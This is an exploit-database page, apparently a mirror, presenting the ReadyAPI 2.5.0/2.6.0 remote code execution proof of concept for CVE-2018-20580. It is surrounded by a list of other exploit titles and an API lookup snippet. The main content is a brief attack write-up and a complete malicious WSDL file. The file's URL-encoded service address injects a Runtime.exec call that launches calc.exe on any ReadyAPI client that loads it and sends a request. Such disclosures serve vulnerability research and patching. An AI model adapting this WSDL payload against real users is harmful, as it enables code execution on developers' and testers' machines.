Menu

Improved exploit search engine. Try it out

"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution"

Author

"Gilson Camelo"

Platform

multiple

Release date

2019-05-06

Release Date Title Type Platform Author
2019-07-12 "Xymon 4.3.25 - useradm Command Execution (Metasploit)" remote multiple Metasploit
2019-07-10 "Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access" dos multiple "Google Security Research"
2019-07-09 "Firefox 67.0.4 - Denial of Service" dos multiple "Tejas Ajay Naik"
2019-07-03 "Symantec DLP 15.5 MP1 - Cross-Site Scripting" webapps multiple "Chapman Schleiss"
2019-07-01 "CyberPanel 1.8.4 - Cross-Site Request Forgery" webapps multiple "Bilgi Birikim Sistemleri"
2019-07-01 "Sahi pro 8.x - Directory Traversal" webapps multiple "Alexander Bluestein"
2019-07-01 "SAP Crystal Reports - Information Disclosure" webapps multiple "Mohamed M.Fouad"
2019-07-01 "Varient 1.6.1 - SQL Injection" webapps multiple "Mehmet EMIROGLU"
2019-06-26 "Mozilla Spidermonkey - IonMonkey 'Array.prototype.pop' Type Confusion" dos multiple "Google Security Research"
2019-06-24 "GrandNode 4.40 - Path Traversal / Arbitrary File Download" webapps multiple "Corey Robinson"
2019-06-25 "SuperDoctor5 - 'NRPE' Remote Code Execution" remote multiple "Simon Gurney"
2019-06-18 "Sahi pro 8.x - Cross-Site Scripting" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 8.x - SQL Injection" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 7.x/8.x - Directory Traversal" webapps multiple "Goutham Madhwaraj"
2019-06-17 "RedwoodHQ 2.5.5 - Authentication Bypass" webapps multiple EthicalHCOP
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - Type Confusion" dos multiple "X41 D-Sec GmbH"
2019-06-05 "Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free" dos multiple "Google Security Research"
2019-05-28 "Phraseanet < 4.0.7 - Cross-Site Scripting" webapps multiple "Krzysztof Szulski"
2019-05-27 "Deltek Maconomy 2.2.5 - Local File Inclusion" webapps multiple JameelNabbo
2019-05-29 "Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation" dos multiple "Google Security Research"
2019-05-29 "Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script" dos multiple "Google Security Research"
2019-05-22 "Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting" webapps multiple Vingroup
2019-05-22 "Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions" webapps multiple Vingroup
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-05-06 "ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution" webapps multiple "Gilson Camelo"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46796/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46796/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46796/41235/readyapi-250-260-remote-code-execution/download/", "exploit_id": "46796", "exploit_description": "\"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution\"", "exploit_date": "2019-05-06", "exploit_author": "\"Gilson Camelo\"", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
<!--
# Exploit Title: ReadyAPI Remote Code Execution Vulnerability.
# Date: May, 2019
# Exploit Author: Gilson Camelo => https://twitter.com/gscamelo
# Vendor Homepage: https://smartbear.com/product/ready-api
# Software Link: https://smartbear.com/product/ready-api/overview/
# Github: https://github.com/gscamelo/CVE-2018-20580
# Version: 2.5.0 and 2.6.0
# Tested on: Windows
# CVE : CVE-2018-20580

I found a new vulnerability in the (ReadyAPI). It allows an attacker to
execute a remote code on the local machine putting in danger the ReadyAPI
users including developers, pentesters, etc...

The ReadyAPI allows users to open a SOAP project and import WSDL files that
help the users to communicate with the remote server easily.

The WSDL file owner can determine default values of some parameters. An
attacker can impersonate a legitimate web service and inject a malicious
code into a default value of one of the parameters and spread it to
ReadyAPI clients.

When a ReadyAPI client load a malicious WSDL file to his project and send a
request containing the malicious code the ReadyAPI will execute the
malicious code on the victim's computer.

The attack scenario:

An attacker impersonates a regular web service with a WSDL containing the
malicious code.
The victim creates a new project in the ReadyAPI and loads the malicious
WSDL File.
The victim decides to send a request to the remote server and the ReadyAPI
execute the malicious code.
The attacker succeeds in executing malicious code in the victim's machine
and take it over.
-->

<?xml version="1.0" encoding="UTF-8"?>
<wsdl:definitions
                xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
                xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
                xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"
                xmlns:tns="http://example.com/stockquote.wsdl"
                xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
                xmlns:s="http://www.w3.org/2001/XMLSchema"
                xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
                targetNamespace="http://example.com/stockquote.wsdl"
                xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">

  <wsdl:types>
    <s:schema elementFormDefault="qualified" targetNamespace="http://example.com/stockquote.wsdl">
      <s:element name="Malicious_Request">
        <s:complexType>
          <s:sequence>
            <s:element name="Payload" default="PWNED" type="s:string" />
          </s:sequence>
        </s:complexType>
      </s:element>

    </s:schema>
  </wsdl:types>
  <wsdl:message name="Malicious_RequestSoapIn">
    <wsdl:part name="parameters" element="tns:Malicious_Request" />
  </wsdl:message>

  <wsdl:portType name="Exploit">
    <wsdl:operation name="Malicious_Request">
      <wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">Create a new xpl</wsdl:documentation>
      <wsdl:input message="tns:Malicious_RequestSoapIn" />
      <wsdl:output message="tns:Malicious_RequestSoapOut" />
    </wsdl:operation>
  </wsdl:portType>

  <wsdl:binding name="Exploit" type="tns:Exploit">
    <soap:binding transport="http://schemas.xmlsoap.org/soap/http" />
    <wsdl:operation name="Malicious_Request">
      <soap:operation soapAction="https://www.test.com.br/Malicious_Request" style="document" />
      <wsdl:input>
        <soap:body use="literal" />
      </wsdl:input>
      <wsdl:output>
        <soap:body use="literal" />
      </wsdl:output>
    </wsdl:operation>
  </wsdl:binding>

  <wsdl:service name="XPL">
    <wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">My first Exploit</wsdl:documentation>
    <wsdl:port name="Exploit" binding="tns:Exploit">
      <soap:address location="http%3A%2F%2F127.0.0.1%2F%24%7B%3DRuntime.getRuntime%28%29.exec%28%27calc.exe%27%29%7D%3B" />
    </wsdl:port>

  </wsdl:service>
</wsdl:definitions>